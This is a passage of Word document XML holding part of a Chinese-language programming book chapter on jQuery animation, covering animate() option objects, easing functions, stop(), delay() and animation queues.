        <w:t>方法类似，只是动画内容是元素宽度）：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>$("img").animate({</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>width:"hide",</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>borderLeft:"hide",</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>borderRight:"hide",</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>paddingLeft:"hide",</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>paddingRight:"hide"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将上面的属性值替换为</w:t>
      </w:r>
      <w:r>
        <w:t>"show"</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>"toggle"</w:t>
      </w:r>
      <w:r>
        <w:t>，就可以产生水平滑动的伸缩效果，类似</w:t>
      </w:r>
      <w:r>
        <w:t>sli</w:t>
      </w:r>
      <w:r>
        <w:t>deDown()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>slideToggle()</w:t>
      </w:r>
      <w:r>
        <w:t>效果。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para08"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>2.</w:t>
      </w:r>
      <w:r>
        <w:t>动画选项对象</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>animate()</w:t>
      </w:r>
      <w:r>
        <w:t>方法的第二个参数是可选的，该选项对象用来指定动画如何执行。有两个最重要的选项我们已经接触过。</w:t>
      </w:r>
      <w:r>
        <w:t>duration</w:t>
      </w:r>
      <w:r>
        <w:t>属性指定动画持续的毫秒时间，该属性的值还可以是</w:t>
      </w:r>
      <w:r>
        <w:t>"fast"</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>"slow"</w:t>
      </w:r>
      <w:r>
        <w:t>或任何在</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery.fx.speeds</w:t>
      </w:r>
      <w:r>
        <w:t>中定义的名称。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>另一个接触过的选项是</w:t>
      </w:r>
      <w:r>
        <w:t>complete</w:t>
      </w:r>
      <w:r>
        <w:t>属性：它指明在动画完成时的回调函数。和</w:t>
      </w:r>
      <w:r>
        <w:t>complete</w:t>
      </w:r>
      <w:r>
        <w:t>属性类似，</w:t>
      </w:r>
      <w:r>
        <w:t>step</w:t>
      </w:r>
      <w:r>
        <w:t>属性指定在动画每一步或每一帧调用的回调函数。在回调函数中，</w:t>
      </w:r>
      <w:r>
        <w:t>this</w:t>
      </w:r>
      <w:r>
        <w:t>指向正在连续变</w:t>
      </w:r>
      <w:r>
        <w:t>化的元素，第一个参数则是正在变化的属性的当前值。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在选项对象中，</w:t>
      </w:r>
      <w:r>
        <w:t>queue</w:t>
      </w:r>
      <w:r>
        <w:t>属性指定动画是否需要队列化</w:t>
      </w:r>
      <w:r>
        <w:t>——</w:t>
      </w:r>
      <w:r>
        <w:t>是否需要等到所有尚未发生的动画都完成后再执行该动画。默认情况下，所有动画都是队列化的。将</w:t>
      </w:r>
      <w:r>
        <w:t>queue</w:t>
      </w:r>
      <w:r>
        <w:t>属性设置为</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>可以取消队列化。非队列化的动画会立刻执行。随后队列化的动画不会等待非队列化的动画执行完成后才执行。考虑以下代码：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>$("img").fadeIn(500)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>.animate({"width":"+=100"},{queue:false,duration:1000})</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>.fadeOut(5</w:t>
      </w:r>
      <w:r>
        <w:t>00);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>上面的</w:t>
      </w:r>
      <w:r>
        <w:t>fadeIn()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>fadeOut()</w:t>
      </w:r>
      <w:r>
        <w:t>效果是队列化的，但</w:t>
      </w:r>
      <w:r>
        <w:t>animate()</w:t>
      </w:r>
      <w:r>
        <w:t>的调用（在</w:t>
      </w:r>
      <w:r>
        <w:t>1000</w:t>
      </w:r>
      <w:r>
        <w:t>毫秒内连续改变</w:t>
      </w:r>
      <w:r>
        <w:t>width</w:t>
      </w:r>
      <w:r>
        <w:t>属性）是非队列化的。这段</w:t>
      </w:r>
      <w:r>
        <w:t>width</w:t>
      </w:r>
      <w:r>
        <w:t>动画和</w:t>
      </w:r>
      <w:r>
        <w:t>fadeIn()</w:t>
      </w:r>
      <w:r>
        <w:t>效果的开始时间相同。</w:t>
      </w:r>
      <w:r>
        <w:t>fadeOut()</w:t>
      </w:r>
      <w:r>
        <w:t>效果会在</w:t>
      </w:r>
      <w:r>
        <w:t>fadeIn()</w:t>
      </w:r>
      <w:r>
        <w:t>效果完成时立刻开始，它不会等到</w:t>
      </w:r>
      <w:r>
        <w:t>width</w:t>
      </w:r>
      <w:r>
        <w:t>动画完成。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para07"/>
      </w:pPr>
      <w:r>
        <w:t>缓动函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para05"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>实现动画时，时间和动画属性值之间可以是线性关系，这种方式很直接，但不够好。例如，一段时长</w:t>
      </w:r>
      <w:r>
        <w:t>400ms</w:t>
      </w:r>
      <w:r>
        <w:t>的动画，在</w:t>
      </w:r>
      <w:r>
        <w:t>100ms</w:t>
      </w:r>
      <w:r>
        <w:t>时，动画完成了</w:t>
      </w:r>
      <w:r>
        <w:t>25%</w:t>
      </w:r>
      <w:r>
        <w:t>。在该线性动画中，如果将不透明度从</w:t>
      </w:r>
      <w:r>
        <w:t>1.0</w:t>
      </w:r>
      <w:r>
        <w:t>变化到</w:t>
      </w:r>
      <w:r>
        <w:t>0.0</w:t>
      </w:r>
      <w:r>
        <w:t>（可能是一</w:t>
      </w:r>
      <w:r>
        <w:t>个</w:t>
      </w:r>
      <w:r>
        <w:t>fadeOut()</w:t>
      </w:r>
      <w:r>
        <w:t>调用），则在</w:t>
      </w:r>
      <w:r>
        <w:t>100ms</w:t>
      </w:r>
      <w:r>
        <w:t>时，不透明度应该是</w:t>
      </w:r>
      <w:r>
        <w:t>0.75</w:t>
      </w:r>
      <w:r>
        <w:t>。然而，事实表明，非线性的动画效果会带来更愉悦的体验。因此，</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>引入了</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>缓动函数</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>，来将基于时间的完成百分比映射到动画效果的百分比。</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>在调用缓动函数时会传入一个基于时间的</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>～</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>之间的值。缓动函数会返回另一个</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>～</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>之间的值，</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>会根据该返回值来计算</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>属性的值。通常，缓动函数在传入</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>时会返回</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>，在传入</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>时会返回</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>。当然，在</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>～</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>之间缓动函数可以是非线性的，这可以让动画有加速和减速效果。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para05"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>的默认缓动函数是</w:t>
      </w:r>
      <w:r>
        <w:t>正弦函数：它开始很慢，接着加速，然后再缓慢</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>缓动</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>变化到终值。</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>中的缓动函数有名字。默</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>认的缓动函数名为</w:t>
      </w:r>
      <w:r>
        <w:t>"swing"</w:t>
      </w:r>
      <w:r>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>还实现了一个线性缓动函数，名字为</w:t>
      </w:r>
      <w:r>
        <w:t>"linear"</w:t>
      </w:r>
      <w:r>
        <w:t>。可以添加自定义缓动函数到</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery.easing</w:t>
      </w:r>
      <w:r>
        <w:t>对象上：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>jQuery.easing["squareroot"]=Math.sqrt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para05"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery UI</w:t>
      </w:r>
      <w:r>
        <w:t>类库中，有一个</w:t>
      </w:r>
      <w:r>
        <w:t>“jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>缓动插件</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>定义了一套更复杂的缓动函数。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>剩余的动画选项和缓动函数有关。选项对象的</w:t>
      </w:r>
      <w:r>
        <w:t>easing</w:t>
      </w:r>
      <w:r>
        <w:t>属性指定缓动函数名。</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>默认使用的是命名为</w:t>
      </w:r>
      <w:r>
        <w:t>"swing"</w:t>
      </w:r>
      <w:r>
        <w:t>的正弦函数。如果想让动画线性变化，可以使用如下选项：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>$("img").animate({"width":"+=100"},{duration:500,easing:"linear"});</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>是否还记得，除了传入选项对象，</w:t>
      </w:r>
      <w:r>
        <w:t>duration</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>easing</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>complete</w:t>
      </w:r>
      <w:r>
        <w:t>选项可以指定为</w:t>
      </w:r>
      <w:r>
        <w:t>animate()</w:t>
      </w:r>
      <w:r>
        <w:t>方法的参数。因此，上面的代码还可以写成：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>$("img").animate({"width</w:t>
      </w:r>
      <w:r>
        <w:t>":"+=100"},500,"linear");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>最后，</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>动画框架甚至还允许为不同的</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>动画属性指定不同的缓动函数。这有两种方式来实现，代码示例如下：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>用</w:t>
      </w:r>
      <w:r>
        <w:t>hide()</w:t>
      </w:r>
      <w:r>
        <w:t>方法隐藏图片，图片的大小采用线性动画</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>不透明度则使用默认的</w:t>
      </w:r>
      <w:r>
        <w:t>"swing"</w:t>
      </w:r>
      <w:r>
        <w:t>缓动函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>实现方式一：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:t>specialEasing</w:t>
      </w:r>
      <w:r>
        <w:t>选项来指定自定义缓动函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>$("img").animate({width:"hide",height:"hide",opacity:"hide"},?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>{specialEasing:{w</w:t>
      </w:r>
      <w:r>
        <w:t>idth:"linear",height:"linear"}});//</w:t>
      </w:r>
      <w:r>
        <w:t>实现方式二：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>在第一个对象参数中传入</w:t>
      </w:r>
      <w:r>
        <w:t>[</w:t>
      </w:r>
      <w:r>
        <w:t>目标值</w:t>
      </w:r>
      <w:r>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t>缓动函数</w:t>
      </w:r>
      <w:r>
        <w:t>]</w:t>
      </w:r>
      <w:r>
        <w:t>数组</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>$("img").animate({</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>width:["hide","linear"],height:["hide","linear"],opacity:"hide"</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490" w:name="19_5_3_Dong_Hua_De_Qu_Xiao___Yan_Chi_He_"/>
      <w:r>
        <w:t>19.5.3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　动画的取消、延迟和队列</w:t>
      </w:r>
      <w:bookmarkEnd w:id="490"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>还定义了一些动画和队列相关的方法，我们需要进一步了解。首先是</w:t>
      </w:r>
      <w:r>
        <w:t>stop()</w:t>
      </w:r>
      <w:r>
        <w:t>方法：它用来停止选中元素上的当前正在执行的任何动画。</w:t>
      </w:r>
      <w:r>
        <w:t>top()</w:t>
      </w:r>
      <w:r>
        <w:t>方法接受两个可选</w:t>
      </w:r>
      <w:r>
        <w:t>的布尔值参数。如果第一个参数是</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>，会清除该选中元素上的动画队列：除了停止当前动画，还会取消任何等待执行的动画。第一个参数的默认值是</w:t>
      </w:r>
      <w:r>
        <w:t>false:</w:t>
      </w:r>
      <w:r>
        <w:t>如果忽略该参数，等待执行的动画不会被取消。第二个参数用来指定正在连续变化的</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>属性是否保留当前值，还是应该变化到最终目标值。传入</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>可以让它们变化到最终值。传入</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>（或省略该参数）会让它们保持为当前值。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>当动画是由用户事件触发时，在开始新的动画前，可能需要取消掉当前或等待执行的任何动画。比如：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>当鼠标悬浮在图片上时，图片变得不透明</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>注意：我</w:t>
      </w:r>
      <w:r>
        <w:t>们没有在鼠标事件上持有队列化动画</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>$("img").bind({</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>mouseover:function(){$(this).stop().fadeTo(300,1.0);},</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>mouseout:function(){$(this).stop().fadeTo(300,0.5);}</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与动画相关的第二个方法是</w:t>
      </w:r>
      <w:r>
        <w:t>delay()</w:t>
      </w:r>
      <w:r>
        <w:t>。这会直接添加一个时间延迟到动画队列中：第一个参数是时长（以毫秒为单位的数值或字符串），第二个参数是队列名，是可选的（通常并不需要第二个参数：接下来我们会解释队列名）。可以在复合动画中使用</w:t>
      </w:r>
      <w:r>
        <w:t>delay()</w:t>
      </w:r>
      <w:r>
        <w:t>，代码如下：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>快速淡出为半透明，等一等，然后向上滑动</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>$("img").fadeTo(100,0.5).delay(200).slideUp();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在上面的</w:t>
      </w:r>
      <w:r>
        <w:t>stop()</w:t>
      </w:r>
      <w:r>
        <w:t>方法例子中，使用</w:t>
      </w:r>
      <w:r>
        <w:t>mouseover</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>mouseout</w:t>
      </w:r>
      <w:r>
        <w:t>事件来变化图片的透明度。可以调整该例子：在开</w:t>
      </w:r>
      <w:r>
        <w:t>始动画时，添加一个短小的延迟。这样，当鼠标快速滑过图片而不停留时，不会有任何分神的动画产生：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>$("img").bind({</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>mouseover:function(){$(this).stop(true).delay(100).fadeTo(300,1.0);},</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>mouseout:function(){$(this).stop(true).fadeTo(300,0.5);}</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和动画相关的最后一组方法可以对</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>的队列机制进行底层操作。</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>队列是按顺序执行的函数列表。每一个队列都与</w:t>
      </w:r>
      <w:r>
        <w:t>一个文档元素（或者是</w:t>
      </w:r>
      <w:r>
        <w:t>Document</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>对象）关联，每一个元素的队列都与其他元素的队列彼此独立。可以使用</w:t>
      </w:r>
      <w:r>
        <w:t>queque()</w:t>
      </w:r>
      <w:r>
        <w:t>方法给队列添加一个新函数。当某个函数到达队列头部时，它会自动从队列中去除并被调用。当函数被调用时，</w:t>
      </w:r>
      <w:r>
        <w:t>this</w:t>
      </w:r>
      <w:r>
        <w:t>指向与队列相关联的元素。被调用的函数会传入唯一一个回调函数作为参数。当函数完成运行时，它必须调用回调函数。这可以运行队列中的下一个操作，如果不调用回调函数，该队列会停止运行，剩余的函数将永远不会被调用。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
